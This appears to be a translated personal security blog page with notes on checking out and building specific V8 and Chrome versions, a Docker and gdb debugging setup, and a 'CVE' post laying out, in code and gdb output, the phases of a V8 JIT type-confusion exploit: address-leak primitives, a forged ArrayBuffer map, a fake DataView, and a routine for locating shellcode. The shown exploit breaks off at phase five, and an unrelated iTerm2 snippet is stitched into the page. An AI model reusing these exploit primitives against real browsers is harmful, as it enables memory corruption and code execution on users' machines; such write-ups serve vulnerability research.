# Compiling a checked-out version

## Checkout after patching

To compile, with the dependencies already installed, run the following commands in order from the working directory:

* fetch v8

* cd v8

* git checkout 1a1a1a1a1a

* gclient sync

```
root@0df6d19cd3c1:/hack/v8_5.8.283/v8# git checkout eda659cc5e307f20ac1ad542ba12ab32eaf4c7ef
Checking out files: 100% (7801/7801), done.
Previous HEAD position was 9afecd5f44 Update wasm-spec.
HEAD is now at eda659cc5e Version 5.8.283
root@0df6d19cd3c1:/hack/v8_5.8.283/v8# gclient sync
```

The message shows that HEAD has moved to the requested commit.

That is why the compile then works properly.
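A check worth running right after the checkout (added here as an example; it is not from the original post): read the version macros from include/v8-version.h, the header every V8 checkout carries, and compare them with the version you meant to build, so a checkout that silently landed on the wrong commit is caught before an hour-long build. The helper names and the sample header contents below are constructed for the example; the sample values match the 5.8.283 tag shown in the session above.

```shell
#!/bin/sh
# Added example, not from the original post: verify a V8 checkout by its
# version header instead of trusting the "HEAD is now at ..." message alone.
# Usage: V8_DIR=/hack/v8_5.8.283/v8 EXPECTED=5.8.283 sh check_v8_version.sh

# Print "MAJOR.MINOR.BUILD.PATCH" from a v8-version.h file.
v8_version_of() {
    awk '
        /^#define V8_MAJOR_VERSION/ { major = $3 }
        /^#define V8_MINOR_VERSION/ { minor = $3 }
        /^#define V8_BUILD_NUMBER/  { build = $3 }
        /^#define V8_PATCH_LEVEL/   { patch = $3 }
        END { printf "%s.%s.%s.%s\n", major, minor, build, patch }
    ' "$1"
}

# Return 0 when the header matches the expected "MAJOR.MINOR.BUILD" prefix
# (the tag style used on this page, e.g. 5.8.283), 1 otherwise.
check_v8_version() {
    header=$1
    expected=$2
    actual=$(v8_version_of "$header")
    case "$actual" in
        "$expected".*)
            echo "OK: checkout is V8 $actual (expected $expected)"
            return 0 ;;
        *)
            echo "MISMATCH: header says V8 $actual, expected $expected" >&2
            return 1 ;;
    esac
}

# Constructed sample standing in for include/v8-version.h at the 5.8.283 tag
# (values assumed for the example, not copied from a real checkout).
SAMPLE_HEADER=$(mktemp)
cat > "$SAMPLE_HEADER" <<'EOF'
// Constructed sample, not the real file.
#define V8_MAJOR_VERSION 5
#define V8_MINOR_VERSION 8
#define V8_BUILD_NUMBER 283
#define V8_PATCH_LEVEL 0
#define V8_IS_CANDIDATE_VERSION 0
EOF

# Check a real checkout when V8_DIR points at one, otherwise run on the sample.
if [ -f "${V8_DIR:-}/include/v8-version.h" ]; then
    check_v8_version "$V8_DIR/include/v8-version.h" "${EXPECTED:-5.8.283}"
else
    check_v8_version "$SAMPLE_HEADER" 5.8.283
fi
```

Run it from the checkout after `gclient sync`; a non-zero exit means the working tree is not the version the tag name promised, which is exactly the situation the depot_tools/v8/Chrome version confusion below produces.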

Posted by goldpapa

depot_tools, v8 and Chrome are three different things.

In particular, v8 and Chrome are versioned separately, so take care to match them; otherwise you will waste a lot of time digging in the wrong version.


CVE

Uncategorized 2019. 3. 30. 22:59

Creating ab_map_obj

phase 1 : set ab_map_obj[]

Obtain the address of ab.__proto__ and write it into ab_map_obj.

```
//alert_log(addr);
var nop = 0xdaba0000;
var ab_map_obj = [
        nop,nop,
        0x1f000008,0x000900c0,0x082003ff,0x0,
        nop,nop,   // use ut32.prototype replace it
        nop,nop,0x0,0x0
]
ab_proto_addr = read_obj_addr(ab.__proto__);
ab_constructor_addr = ab_proto_addr - 0x70;
alert_log("[.] 1.ab_prot_addr: 0x" + ab_proto_addr.toString(16));
//sleep(60*1000);
ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
```

Resulting memory layout as seen in gdb:

```
0x26e976fd3f78:    0xdaba0000daba0000    0x000900c01f000008
0x26e976fd3f88:    0x00000000082003ff    0x000026e976f95889
0x26e976fd3f98:    0x000026e976f95819    0x0000000000000000
```

phase 2 : find the address of ab_map_obj

The value 0x000900c01f000008 should be findable in gdb.

```
change_to_float(ab_map_obj,ab_map_obj_float);
ab_map_obj_addr = read_obj_addr2(ab_map_obj_float) + 0x40
```

```
gdb-peda$ find 0x000900c01f000008
Searching for '0x000900c01f000008' in: None ranges
Found 1 results, display max 1 items:
mapped : 0x26e976fd3f80 --> 0x900c01f000008
```

phase 3 : find the address of fake_ab

```
change_to_float(fake_ab,fake_ab_float);
fake_ab_float_addr = read_obj_addr3(fake_ab_float) + 0x40;
```

```
var fake_ab = [
        ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
        ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
        ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
        0x0,0x4000, /* buffer length */
        0x12345678,0x123,/* buffer address */
        0x4,0x0
]
```

phase 4 : build the fake_arraybuffer object

```
fake_arraybuffer = double_arr42[1];
fake_dv = new DataView(fake_arraybuffer,0,0x4000);
```

```
fake_ab_float_addr_f = d2u(fake_ab_float_addr / 0x100000000,fake_ab_float_addr & 0xffffffff).toString();
function carry_me_plz_fake(arr){
        for(var i = 0;i < arr.length;i++){
                var o = arr[i];
                ttt = o[0];
        }
}
eval('function sorry_fake(){1 + valueOf4;double_arr42[0] = 1.1;carry_me_plz_fake(array4);double_arr42[1] = '+fake_ab_float_addr_f+';}')
for(var i = 0;i < 0x1000;i++){
        carry_me_plz_fake(array3);
}
for(var i = 0;i < 0x1000;i++){
        sorry_fake();
}
flag = 1;
sorry_fake();
//sleep(60)

fake_arraybuffer = double_arr42[1];
```

phase 5 : find the shellcode address

```
function read_obj_addr5(object){
        function carry_me_plz(arr,obj){
                for(var i = 0;i < arr.length;i++){
                        var o = arr[i];
                        o[0] = obj;
                }
        }
        function sorry(){
                1 + valueOf5;
                double_arr52[0] = 1.1;
                carry_me_plz(array5,object);
                return double_arr52[0];
        }
        for(var i = 0;i < 0x1000;i++){
                carry_me_plz(array5,object);
        }
        for(var i = 0;i < 0x1000;i++){
                sorry();
        }
        flag = 1;
        re = u2d(sorry());
        return re;
}
```
Highlights for New Users - Documentation - iTerm2 - macOS Terminal

 

https://www.iterm2.com/documentation-highlights.html

To select text without using the mouse, press cmd-f to open the find field. .... default, but can be enabled under Preferences > Pointer > Focus follows mouse. ... You can automatically change the current session's profile using Automatic Profile ...

docker run

Uncategorized 2019. 3. 30. 08:56

```
docker run -it --name hack_arm_linux2 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -p 2222:22 -v /Users/lili/hack/docker/ubuntu1804/hack:/hack hack_arm:2
```

The `--cap-add=SYS_PTRACE` and `--security-opt seccomp=unconfined` options are what let gdb attach to processes inside the container; they also remove part of the container's isolation from the host, so they belong on a throwaway debugging container only.

* hugsy/gef: GEF - GDB Enhanced Features for exploit devs & reversers
  https://github.com/hugsy/gef

* longld/peda: PEDA - Python Exploit Development Assistance for GDB
  https://github.com/longld/peda

```
sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386
```

https://askubuntu.com/questions/454253/how-to-run-32-bit-app-in-ubuntu-64-bit

https://docs.vmware.com/kr/VMware-Tools/10.2.0/com.vmware.vsphere.vmwaretools.doc/GUID-08BB9465-D40A-4E16-9E15-8C016CC8166F.html


Compiling Chrome

WHAT 2019. 3. 29. 23:36

Check the Chrome version

https://en.wikipedia.org/wiki/Google_Chrome_version_history

Check the Chrome patch

Chrome GitHub commit + Chrome's v8 engine version

Install depot_tools

https://commondatastorage.googleapis.com/chrome-infra-docs/flat/depot_tools/docs/html/depot_tools_tutorial.html#_setting_up

```
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
export PATH=$PATH:/path/to/depot_tools
```

Download the source and check out

https://v8.dev/docs/source-code

```
mkdir ~/v8
cd ~/v8
fetch v8
cd v8
git checkout -b 1a1a1a1a1a
```

* 1a1a1a1a1a is the v8 commit, not the Chromium version (take care)
* Chromium version: 63.0.3239
* (Linux, macOS, and Windows)    Blink 537.36
* v8 version: 6.3.292

Install the dependencies

```
cd ~/v8/v8 && ./build/install-build-deps.sh
gclient sync
```

Configure the build

https://v8.dev/docs/build

```
tools/dev/v8gen.py list
tools/dev/v8gen.py ia32.release
```

Build

https://v8.dev/docs/build-gn

* `ninja -C out/x64.release` : full build, about 1300 build steps
* `ninja -C out/x64.release d8` : builds only d8, about 900 build steps, roughly one hour

[Reference]

```
root@0df6d19cd3c1:/hack/v8/v8# tools/dev/v8gen.py x64.debug
root@0df6d19cd3c1:/hack/v8/v8# ninja -C out.gn/x64.debug
ninja: Entering directory `out.gn/x64.debug'
[15/1390] CXX obj/simple_fuzzer/fuzzer.o^C
ninja: build stopped: interrupted by user.
root@0df6d19cd3c1:/hack/v8/v8# ninja -C out.gn/x64.debug d8
ninja: Entering directory `out.gn/x64.debug'
[21/966] CXX obj/v8_libplatform/trace-config.o
```


Making zsh pretty on the Mac


https://beomi.github.io/2017/07/07/Beautify-ZSH/
